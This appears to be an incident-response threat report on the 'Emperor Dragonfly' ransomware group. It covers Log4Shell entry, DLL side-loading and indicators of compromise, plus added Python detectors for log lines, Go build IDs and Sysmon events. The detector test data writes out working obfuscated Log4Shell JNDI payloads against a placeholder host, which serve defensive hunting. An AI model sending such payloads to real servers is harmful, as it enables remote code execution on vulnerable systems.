
A Chinese hacking group known as "Emperor Dragonfly" has been linked to the Cheerscrypt ransomware; the group is known to switch frequently between ransomware families to avoid being tracked. Since 2021 the group, tracked as Bronze Starlight by Secureworks and as DEV-0401 by Microsoft, has been observed deploying multiple ransomware families under different brands.

Though it appears that the hacking group is running a ransomware operation, prior research has shown that many of their victims are of interest to the Chinese government. Researchers have concluded that the hacking group’s ransomware activities may be a front for Chinese government-sponsored cyber espionage.

Night Sky and Cheerscrypt

During an incident response engagement earlier this year, Sygnia's security experts determined that the attackers exploited the Apache Log4j 'Log4Shell' vulnerability (CVE-2021-44228) to execute PowerShell commands, which in turn set up the DLL side-loading chain typical of Night Sky TTPs. They then planted a Cobalt Strike beacon that called back to a command-and-control (C2) address normally used for Night Sky operations. The attackers also used a modified version of the Aliyun OSS keylogger, a modified version of the 'IOX' port-forwarding and proxy tool, and a modified version of the 'NPS' tunnelling tool, all of them Go tools that are rarely seen in the ransomware space. While the attack followed the same pattern of reconnaissance and lateral movement as previous Night Sky intrusions, the ransomware strain used to encrypt the Windows and Linux ESXi machines was not Night Sky but Cheerscrypt.

Overlap between the two ransomware strains

In May 2022, researchers at Trend Micro documented a new encryptor targeting VMware ESXi servers, which they dubbed "Cheerscrypt". Like other enterprise-focused ransomware groups, the operators break into networks, steal data, and then encrypt devices. The stolen data gives them a second lever: victims who refuse to pay are threatened with publication of their files on a leak site, on top of the encryption itself. Below is an example of the data leak website used when a ransom is not paid.

[Figure: Cheerscrypt dark web leak site, showing the flag of Ukraine and the Ukrainian national salute]

Frequently switching ransomware strains

Sygnia assesses that Cheerscrypt is just another example of Emperor Dragonfly's ongoing practice of rebranding its payload to avoid being tracked. Rather than operating a RaaS (Ransomware-as-a-Service) platform for affiliates, the group acts as a solitary "lone wolf" in the cybercriminal underworld. According to a report published by Secureworks in June 2022, the threat actor uses ransomware families such as Night Sky, Rook, Pandora, and AtomSilo to disguise government-sponsored cyber-espionage campaigns as financially motivated attacks. Microsoft likewise lists the group it tracks as DEV-0401 among the ransomware operations it monitors and assesses that it is likely a China-based threat actor.

Microsoft's threat intelligence researchers noted that DEV-0401 "appears to be an activity group involved in all stages of their attack lifecycle," from gaining initial access to compromised systems through to developing the ransomware itself. However, the report adds, "they seem to take some inspiration from successful RaaS operations with the frequent rebranding of their ransomware payloads." Among the human-operated ransomware threat actors tracked by Microsoft, DEV-0401 stands out as the only one based in China. Both Secureworks and Microsoft observed the group constantly changing ransomware families, which have also included LockFile and LockBit 2.0, among others.

There are many similarities between the code bases of Night Sky, Pandora, and Rook, all of which are built on the leaked source code of the Babuk ransomware. Trend Micro has also stated that Cheerscrypt appears to be based on Babuk, so the pieces fit together.

Defending Against Emperor Dragonfly

Whatever the true motivations of the group known as "Emperor Dragonfly", exploiting vulnerabilities in Internet-facing servers is its usual way in, so installing available security patches as soon as possible is critical. Since this group is known to exploit the Log4j flaw in VMware Horizon servers, deploying the latest patches for those systems should be a top priority. Patching closes the door but does not evict an intruder who is already inside: hosts that were exposed before the patch was applied should also be checked for the indicators in Appendix I, in particular the signed vendor executables and side-loaded DLLs staged under C:\Windows\Help and C:\Windows\debug.
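Because the actor's entry point in this case was Log4Shell, the first thing to hunt for on an exposed Horizon server is exploitation attempts in its web logs. As an added example (this is not Sygnia's code and is not part of the original report), the Python below de-obfuscates Log4j lookup strings the way Log4j 2.x evaluates them, innermost first, so that the `${lower:}`, `${upper:}` and `${...:-default}` tricks attackers use to dodge naive `${jndi:` greps are resolved before matching. The log lines are constructed for the example; the paths, hosts and addresses in them are placeholders, not indicators from this report.

```python
import re

# One innermost Log4j lookup: ${...} whose body contains no further ${ or }.
INNERMOST = re.compile(r"\$\{([^${}]*)\}")


def resolve_lookup(body: str) -> str:
    """Approximate Log4j 2.x evaluation of the lookups attackers abuse for
    obfuscation. Anything not modelled is replaced by its bare body so the
    outer loop always makes progress."""
    lower = body.lower()
    if lower.startswith("lower:"):          # ${lower:J} -> j
        return body[6:].lower()
    if lower.startswith("upper:"):          # ${upper:n} -> N
        return body[6:].upper()
    if ":-" in body:                        # ${env:NOPE:-j} and ${::-j} -> default value j
        return body.split(":-", 1)[1]
    return body


def has_jndi_lookup(text: str, max_rounds: int = 64) -> bool:
    """True if the text, once de-obfuscated innermost-first (the order Log4j
    itself uses), contains a ${jndi:...} lookup. Lookup names are matched
    case-insensitively, as Log4j's Interpolator does."""
    for _ in range(max_rounds):
        m = INNERMOST.search(text)
        if m is None:
            return False
        body = m.group(1)
        if body.lower().startswith("jndi:"):
            return True
        text = text[: m.start()] + resolve_lookup(body) + text[m.end():]
    return False


def scan_access_log(lines):
    """Return 1-based line numbers of requests carrying a JNDI lookup anywhere
    in the logged line (path, query string, User-Agent or other headers)."""
    return [n for n, line in enumerate(lines, 1) if has_jndi_lookup(line)]


# CONSTRUCTED sample lines in combined-log style; hosts and paths are placeholders.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2022:10:00:00 +0000] "GET /portal/webclient/index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [01/Jan/2022:10:00:01 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '198.51.100.7 - - [01/Jan/2022:10:00:02 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${${lower:j}${upper:n}di:${::-l}dap://198.51.100.7:1389/a}"',
    '198.51.100.7 - - [01/Jan/2022:10:00:03 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${java:version}"',
    '198.51.100.7 - - [01/Jan/2022:10:00:04 +0000] "GET /portal/?x=${${env:NaN:-j}ndi:rmi://198.51.100.7:1099/x} HTTP/1.1" 404 0 "-" "curl/7.79"',
]

if __name__ == "__main__":
    for n in scan_access_log(SAMPLE_LOG):
        print(f"line {n}: JNDI lookup -> {SAMPLE_LOG[n - 1]}")
```

A hit only proves an attempt. Confirmation of exploitation is an outbound LDAP or RMI connection from the Java process that hosts Log4j to the address named in the lookup, followed, in this actor's case, by PowerShell spawning from that process.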

APPENDIX I: INDICATORS OF COMPROMISE 

Cobalt Strike Beacons

MD5 | Description | File Name
37011eed9de6a90f3be3e1cbba6c5ab2 | Encrypted Cobalt Strike payload | C:\Windows\Help\OEM\ContentStore\vlcplayer.dat
2893d476408e23b7e8a65c6898fe43fa | Encrypted Cobalt Strike payload | C:\Windows\Help\Corporate\auth.dat
8161d8339411ddd6d99d54d3aefa2943 | Encrypted Cobalt Strike payload | C:\Windows\debug\debug.dat
5a852305ffb7b5abeb39fcb9a37122ff | Weaponized DLL loaded by vlc.exe | C:\Windows\Help\Corporate\libvlc.dll
f0656e3a70ab0a10f8d054149f12c935 | Encrypted Cobalt Strike payload | C:\Windows\Help\Corporate\auth.dat
37011eed9de6a90f3be3e1cbba6c5ab2 | Encrypted Cobalt Strike payload | C:\Windows\Help\Corporate\vlcplayer.dat

Go Tools

MD5 | Description | File Name
5695de561a065123178067fcedf39ce3 | NPC client for the NPS tunnel tool | C:\Windows\Help\mui\0409\WindowsUpdate.exe
ea4ca87315d14f5142aaef1f5e287417 | Keylogger | C:\Windows\Help\OEM\ContentStore.exe
5a6008cf994779cde1698a0e80bb817d | IOX port forwarder and proxy | C:\Windows\Help\Windows\dec.exe

Additional Artifacts

Artifact | Description
GrPpQGgI4se5fTIRkxBj/nfbcPvfJWpyY5EtRD0hf/CW9u6cXM4f4VKyyzaHJG/OLcdjB95YaMDP6Y1d-Mg | Go Build ID of the NPS client-side binary (WindowsUpdate.exe)
GriAm-TYSQig04-nXbTE/9gsYQSitnL9GPHKgpNUX/QA-vmpyo7vFHuU7RQ\ Y/_NwncoU6QsMYGeukgxTd | Go Build ID of the keylogger (ContentStore.exe)
UpdateService (Windows service) | Service name; persistence mechanism for the NPS client-side binary
C85A6814B99C8302AF484563D47D9658 | MD5 hash of SharpShares, an open-source tool to enumerate shares
07d14d16d21d21d00042d41d00041d47e4e0ae17960b2a5b4fd6107fbb0926 | JARM hash of the Cobalt Strike C&C servers
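Go build IDs are a useful pivot because the actor's NPS client and keylogger are Go binaries and the ID is unchanged by renaming or moving the file. As an added example (Python written for this page, not Sygnia's tooling), the following extracts the build ID from a binary and checks it against the value published above. It relies on the layout the Go linker uses: non-ELF binaries (PE, Mach-O) carry a `\xff Go build ID: "..."\n \xff` marker at the start of the text section, and ELF binaries carry a `.note.go.buildid` note whose name field "Go" is immediately followed by the ID; matching the raw note bytes with a regex rather than walking section headers is a shortcut assumed here. Only the NPS client ID is loaded as an indicator, because the keylogger ID as reproduced on the page contains what appears to be an extraction defect. The test blobs are constructed and mimic only the marker, not a real executable.

```python
import re
from typing import Dict, Optional

# Non-ELF Go binaries (PE, Mach-O) carry the build ID as a marker at the start
# of the text section: \xff Go build ID: "<id>"\n \xff  (see cmd/internal/buildid
# in the Go source tree).
TEXT_MARKER = re.compile(rb'\xff Go build ID: "([A-Za-z0-9_\-/]+)"\n \xff')
# ELF binaries store it in a .note.go.buildid note: name "Go" padded to 4 bytes,
# immediately followed by the ID. Matching the raw note bytes is a shortcut used
# here instead of walking the section headers (assumption, see lead-in).
ELF_NOTE = re.compile(rb'Go\x00\x00([A-Za-z0-9_\-/]{20,})')

# Build ID published in Appendix I for the NPS client (WindowsUpdate.exe).
KNOWN_GO_BUILD_IDS: Dict[str, str] = {
    "GrPpQGgI4se5fTIRkxBj/nfbcPvfJWpyY5EtRD0hf/CW9u6cXM4f4VKyyzaHJG/OLcdjB95YaMDP6Y1d-Mg":
        "NPS client-side binary (WindowsUpdate.exe), Emperor Dragonfly",
}


def extract_go_build_id(data: bytes) -> Optional[str]:
    """Return the embedded Go build ID, or None if the blob is not a Go binary
    (or was linked with -ldflags=-buildid= to strip it)."""
    for pattern in (TEXT_MARKER, ELF_NOTE):
        m = pattern.search(data)
        if m:
            return m.group(1).decode("ascii")
    return None


def classify(data: bytes) -> Dict[str, Optional[str]]:
    """Build ID plus the indicator description if it is a known one."""
    bid = extract_go_build_id(data)
    return {"build_id": bid, "known_as": KNOWN_GO_BUILD_IDS.get(bid) if bid else None}


def classify_file(path: str) -> Dict[str, Optional[str]]:
    with open(path, "rb") as fh:
        return classify(fh.read())


# --- CONSTRUCTED test blobs: they mimic only the marker layout, not a real executable.
def fake_pe(build_id: str) -> bytes:
    return b"MZ" + b"\x00" * 62 + b'\xff Go build ID: "' + build_id.encode() + b'"\n \xff' + b"\x00" * 16


def fake_elf_note(build_id: str) -> bytes:
    bid = build_id.encode()
    # namesz=4 ("Go\0\0"), descsz=len(id), type=4 (GOBUILDID), then name and desc padded to 4 bytes
    header = (4).to_bytes(4, "little") + len(bid).to_bytes(4, "little") + (4).to_bytes(4, "little")
    return b"\x7fELF" + b"\x00" * 12 + header + b"Go\x00\x00" + bid + b"\x00" * ((-len(bid)) % 4)


if __name__ == "__main__":
    nps_id = next(iter(KNOWN_GO_BUILD_IDS))
    for blob in (fake_pe(nps_id), fake_elf_note("A" * 20 + "/" + "B" * 20), b"MZ not a Go binary"):
        print(classify(blob))
```

On a host with a Go toolchain, `go tool buildid <file>` prints the same value and is the reference to compare against. The ID changes whenever the actor rebuilds from modified source or with a different toolchain, so a match is high-confidence but a miss carries no information; the MD5 and path indicators in the tables above remain the broader net.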

Network Indicators

IP Address | Description | URL
207[.]148[.]122[.]171 | C&C server | api[.]rogerscorp[.]org
139[.]180[.]217[.]203 | C&C server (the Cobalt Strike Beacon was downloaded from this IP) | -
178[.]128[.]102[.]13 | Cobalt Strike C&C server | -
139[.]59[.]243[.]219 | Cobalt Strike C&C server | -
128[.]199[.]151[.]146 | NPS server | -

Legitimate Executables

MD5 | Description | File Name
322ead69300501356b13d751165daa | Signed McAfee file used to side-load LockDown.dll | c:\Windows\debug\mfeann.exe
51be3e3a8101bc4298b43a64540c422b | Signed FortiClient file used to side-load utilsdll.dll | C:\Windows\Help\Corporate\FCAuth.exe
e2904f5301b35b2722faf578d1f7a4d4 | Signed VLC file used to side-load libvlc.dll | C:\Windows\Help\Corporate\vlc.exe
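The tables above are only useful once they are turned into something that runs over endpoint telemetry. As an added example serving both the DLL side-loading chain described in the Night Sky and Cheerscrypt section and the indicators in this appendix (Python written for this page, not Sygnia's code), the script below applies three hunting rules to Sysmon-style events: an MD5 match against the hashes listed above, a side-load rule that fires when one of the three signed vendor executables loads its paired DLL from the same directory and that directory is one of the staging paths seen here (or the DLL is unsigned), and a network rule against the C&C and NPS addresses. The three signed executables are matched by name and location rather than hash, since one of the published MD5 values is incomplete. The events are constructed for the example; only the paths, hashes and addresses inside them come from this appendix.

```python
import ntpath
from typing import Any, Dict, List

# MD5 indicators transcribed from Appendix I (lower-cased for comparison).
IOC_MD5 = {
    "37011eed9de6a90f3be3e1cbba6c5ab2": "Encrypted Cobalt Strike payload (vlcplayer.dat)",
    "2893d476408e23b7e8a65c6898fe43fa": "Encrypted Cobalt Strike payload (auth.dat)",
    "8161d8339411ddd6d99d54d3aefa2943": "Encrypted Cobalt Strike payload (debug.dat)",
    "5a852305ffb7b5abeb39fcb9a37122ff": "Weaponized libvlc.dll side-loaded by vlc.exe",
    "f0656e3a70ab0a10f8d054149f12c935": "Encrypted Cobalt Strike payload (auth.dat)",
    "5695de561a065123178067fcedf39ce3": "NPS client (WindowsUpdate.exe)",
    "ea4ca87315d14f5142aaef1f5e287417": "Keylogger (ContentStore.exe)",
    "5a6008cf994779cde1698a0e80bb817d": "IOX port forwarder and proxy (dec.exe)",
    "c85a6814b99c8302af484563d47d9658": "SharpShares share enumerator",
}
# C&C / NPS server addresses from Appendix I (defanging brackets removed).
IOC_IPS = {"207.148.122.171", "139.180.217.203", "178.128.102.13", "139.59.243.219", "128.199.151.146"}
# Signed vendor executable -> DLL name it was abused to side-load (Appendix I, Legitimate Executables).
SIDELOAD_PAIRS = {"vlc.exe": "libvlc.dll", "fcauth.exe": "utilsdll.dll", "mfeann.exe": "lockdown.dll"}
# Directories the actor staged its tooling in; a vendor binary has no business running from here.
STAGING_DIRS = ("c:\\windows\\help\\", "c:\\windows\\debug\\")


def parse_sysmon_hashes(field: str) -> Dict[str, str]:
    """'MD5=AB..,SHA256=CD..' -> {'md5': 'ab..', 'sha256': 'cd..'}."""
    out: Dict[str, str] = {}
    for part in field.split(","):
        if "=" in part:
            algo, value = part.split("=", 1)
            out[algo.strip().lower()] = value.strip().lower()
    return out


def check_event(ev: Dict[str, Any]) -> List[Dict[str, Any]]:
    """Apply the three hunting rules to one Sysmon-style event dict.
    For Event ID 7 the Hashes field describes ImageLoaded, for ID 1 the Image."""
    findings: List[Dict[str, Any]] = []
    image = ev.get("Image", "")
    md5 = parse_sysmon_hashes(ev.get("Hashes", "")).get("md5")
    if md5 in IOC_MD5:
        findings.append({"rule": "ioc_hash", "image": image, "detail": IOC_MD5[md5]})
    if ev.get("EventID") == 7:  # ImageLoaded
        loaded = ev.get("ImageLoaded", "")
        host, dll = ntpath.basename(image).lower(), ntpath.basename(loaded).lower()
        host_dir, dll_dir = ntpath.dirname(image).lower(), ntpath.dirname(loaded).lower()
        unsigned = str(ev.get("Signed", "")).lower() == "false"
        if SIDELOAD_PAIRS.get(host) == dll and host_dir == dll_dir and (host_dir.startswith(STAGING_DIRS) or unsigned):
            findings.append({"rule": "dll_sideload", "image": image, "detail": f"{host} loaded {loaded}"})
    if ev.get("EventID") == 3 and ev.get("DestinationIp") in IOC_IPS:  # NetworkConnect
        findings.append({"rule": "c2_ip", "image": image, "detail": ev["DestinationIp"]})
    return findings


def hunt(events: List[Dict[str, Any]]) -> List[Dict[str, Any]]:
    """Run check_event over a stream of events, tagging each finding with its index."""
    findings: List[Dict[str, Any]] = []
    for idx, ev in enumerate(events):
        for f in check_event(ev):
            f["event"] = idx
            findings.append(f)
    return findings


# CONSTRUCTED events mimicking Sysmon IDs 1/3/7 on one host; only the IOC paths, hashes and IPs are from the report.
SAMPLE_EVENTS = [
    {"EventID": 7, "Image": r"C:\Windows\Help\Corporate\vlc.exe", "ImageLoaded": r"C:\Windows\Help\Corporate\libvlc.dll",
     "Hashes": "MD5=5A852305FFB7B5ABEB39FCB9A37122FF", "Signed": "false"},
    {"EventID": 7, "Image": r"C:\Program Files\VideoLAN\VLC\vlc.exe", "ImageLoaded": r"C:\Program Files\VideoLAN\VLC\libvlc.dll",
     "Hashes": "MD5=00000000000000000000000000000000", "Signed": "true"},
    {"EventID": 1, "Image": r"C:\Windows\Help\mui\0409\WindowsUpdate.exe", "Hashes": "MD5=5695de561a065123178067fcedf39ce3"},
    {"EventID": 3, "Image": r"C:\Windows\Help\Corporate\vlc.exe", "DestinationIp": "178.128.102.13", "DestinationPort": 443},
    {"EventID": 3, "Image": r"C:\Windows\System32\svchost.exe", "DestinationIp": "10.0.0.1", "DestinationPort": 53},
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"event {f['event']}: {f['rule']:13} {f['image']}  {f['detail']}")
```

The side-load rule is deliberately the one that survives a rebrand: hashes and C2 addresses change with every campaign, but a signed VLC, FortiClient or McAfee binary sitting under C:\Windows\Help or C:\Windows\debug and loading its own DLL from there is the technique itself, not a sample-specific artifact.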

APPENDIX II: MITRE ATT&CK TTPS

  1. Initial Access
    1. T1190: Exploit Public-Facing Application
  2. Execution
    1. T1059.001: Command and Scripting Interpreter: PowerShell
    2. T1059.003: Command and Scripting Interpreter: Windows Command Shell
    3. T1047: Windows Management Instrumentation
    4. T1569.002: System Services: Service Execution
  3. Persistence
    1. T1543.003: Create or Modify System Process: Windows Service
  4. Defense Evasion
    1. T1027.002: Obfuscated Files or Information: Software Packing
    2. T1574.002: Hijack Execution Flow: DLL Side-Loading
    3. T1070.004: Indicator Removal on Host: File Deletion
  5. Discovery
    1. T1135: Network Share Discovery
    2. T1087.002: Account Discovery: Domain Account
    3. T1082: System Information Discovery
    4. T1016: System Network Configuration Discovery
  6. Lateral Movement
    1. T1570: Lateral Tool Transfer
    2. T1021.001: Remote Services: Remote Desktop Protocol
  7. Collection
    1. T1039: Data from Network Shared Drive
    2. T1056.001: Input Capture: Keylogging
  8. Command & Control
    1. T1090: Proxy
    2. T1095: Non-Application Layer Protocol
    3. T1572: Protocol Tunneling
    4. T1071.001: Application Layer Protocol: Web Protocols
    5. T1132.001: Data Encoding: Standard Encoding
    6. T1573: Encrypted Channel
  9. Exfiltration
    1. T1048: Exfiltration Over Alternative Protocol
    2. T1567.002: Exfiltration Over Web Service: Exfiltration to Cloud Storage
  10. Impact
    1. T1486: Data Encrypted for Impact

Contributors: Oren Biderman, Amnon Kushnir, Noam Lifshitz, Ori Porag, Yoav Mazor, Erez Kalman, Haim Nachmias
